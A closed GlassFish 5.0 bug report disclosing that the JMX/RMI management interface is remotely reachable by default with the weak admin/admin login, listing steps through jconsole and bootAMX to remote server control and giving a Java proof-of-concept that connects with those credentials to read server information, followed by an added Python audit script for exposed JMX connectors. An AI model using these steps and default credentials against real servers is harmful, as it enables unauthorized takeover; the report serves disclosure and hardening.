Closed
Description
Glassfish jmx_rmi Remote monitoring and control problem
Environment Details
- GlassFish Version (and build number): 5.0
- JDK version: 1.8
- OS: win7
Problem Description
- Open the demo by default. GlassFish opens port 7676 by default, and it can be accessed remotely.
- Discover JMX URL:
  `service:jmx:rmi://M0ker/jndi/rmi://172.16.125.128:8686/172.16.125.128/7676/jmxrmi`
- JMX has a weak password: admin/admin
- Meanwhile, more information is missing from jconsole.exe.
- Then click the corresponding function. amx-support --> operation --> bootAMX
- An amx directory appears.
- In amx, functions such as deleting the demo, stopping, closing, creating, and database operations may be operated remotely.
- And there's a lot of server information here.
- Here is a simple Java sample for remote access to information through GlassFish JMX.

```java
package jxm_rmi;

import java.lang.management.ManagementFactory;
import java.lang.management.MemoryMXBean;
import java.util.Hashtable;

import javax.management.MBeanAttributeInfo;
import javax.management.MBeanInfo;
import javax.management.MBeanServerConnection;
import javax.management.ObjectName;
import javax.management.remote.JMXConnector;
import javax.management.remote.JMXConnectorFactory;
import javax.management.remote.JMXServiceURL;

public class JMX_RMI {
    public static void main(String[] args) throws Exception {
        // Credentials and JMX service URL from the report above
        String user = "admin";
        String pass = "admin";
        JMXServiceURL url = new JMXServiceURL("service:jmx:rmi://M0ker/jndi/rmi://172.16.125.128:8686/172.16.125.128/7676/jmxrmi");

        // The connector expects the credentials as a String[] {user, password}
        Hashtable<String, String[]> env = new Hashtable<String, String[]>();
        String[] credentials = new String[] {user, pass};
        env.put(JMXConnector.CREDENTIALS, credentials);

        // try-with-resources closes the connector when the block exits
        try (JMXConnector jmxc = JMXConnectorFactory.connect(url, env)) {
            MBeanServerConnection mbsc = jmxc.getMBeanServerConnection();

            // Read heap and non-heap usage through the platform memory MXBean
            MemoryMXBean mbean = ManagementFactory.newPlatformMXBeanProxy(
                    mbsc, ManagementFactory.MEMORY_MXBEAN_NAME, MemoryMXBean.class);
            System.out.println(mbean.getHeapMemoryUsage());
            System.out.println(mbean.getNonHeapMemoryUsage());

            // List every attribute of the Runtime MBean with its type and value
            ObjectName objectName = new ObjectName("java.lang:type=Runtime");
            MBeanInfo mBeanInfo = mbsc.getMBeanInfo(objectName);
            MBeanAttributeInfo[] mBeanAttributes = mBeanInfo.getAttributes();
            System.out.println("\n");
            System.out.println("MBeanInfos : ");
            for (MBeanAttributeInfo mBeanAttribute : mBeanAttributes) {
                System.out.println("\t"
                        + mBeanAttribute.getName()
                        + "\t"
                        + mBeanAttribute.getType()
                        + "\tvalue = >"
                        + mbsc.getAttribute(objectName, mBeanAttribute.getName()));
            }
            System.out.println("\n");
        }
    }
}
```
Impact of Issue
- This is originally a remote monitoring performance JMX. I don't want it to be a loophole for others to invade me. I hope you can turn it off by default. It does have a certain degree of harm. It can also be remotely manipulated. Thank you very much. Sorry to disturb you!
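
A configuration audit for the exposure reported above, as an added example that is not part of the original issue or of the GlassFish project: it scans a `domain.xml` for enabled JMX connectors that listen on a non-loopback address or have TLS switched off. It assumes the `jmx-connector` element with `address`, `port`, `enabled` and `security-enabled` attributes and their defaults when absent; the sample XML and the function names are constructed for illustration.

```python
import ipaddress
import xml.etree.ElementTree as ET

# Constructed sample, not taken from the report: one exposed and one restricted connector.
SAMPLE_DOMAIN_XML = """<domain><configs>
  <config name="server-config"><admin-service system-jmx-connector-name="system">
    <jmx-connector name="system" address="0.0.0.0" port="8686"
                   auth-realm-name="admin-realm" security-enabled="false"/>
  </admin-service></config>
  <config name="hardened-config"><admin-service system-jmx-connector-name="system">
    <jmx-connector name="system" address="127.0.0.1" port="8686"
                   auth-realm-name="admin-realm" security-enabled="true"/>
  </admin-service></config>
</configs></domain>"""


def is_loopback(address):
    """True only when the bind address is clearly local to the host."""
    if address.lower() == "localhost":
        return True
    try:
        return ipaddress.ip_address(address).is_loopback
    except ValueError:
        return False  # other hostnames are treated as remotely reachable


def audit_jmx_connectors(domain_xml):
    """Return (config, connector, port, issues) for each risky connector."""
    findings = []
    for config in ET.fromstring(domain_xml).iter("config"):
        for conn in config.iter("jmx-connector"):
            # Assumption: a connector without an 'enabled' attribute is enabled.
            if conn.get("enabled", "true").lower() != "true":
                continue
            issues = []
            address = conn.get("address", "0.0.0.0")
            if not is_loopback(address):
                issues.append("listens on non-loopback address " + address)
            # Assumption: TLS is on when 'security-enabled' is absent.
            if conn.get("security-enabled", "true").lower() != "true":
                issues.append("TLS disabled (security-enabled=false)")
            if issues:
                findings.append((config.get("name"), conn.get("name"),
                                 conn.get("port"), issues))
    return findings


if __name__ == "__main__":
    for cfg, name, port, issues in audit_jmx_connectors(SAMPLE_DOMAIN_XML):
        print(f"{cfg}/{name} port {port}: " + "; ".join(issues))
```

The audit covers listener exposure only; the admin/admin password described in the report has to be checked separately, since this script does not inspect credentials.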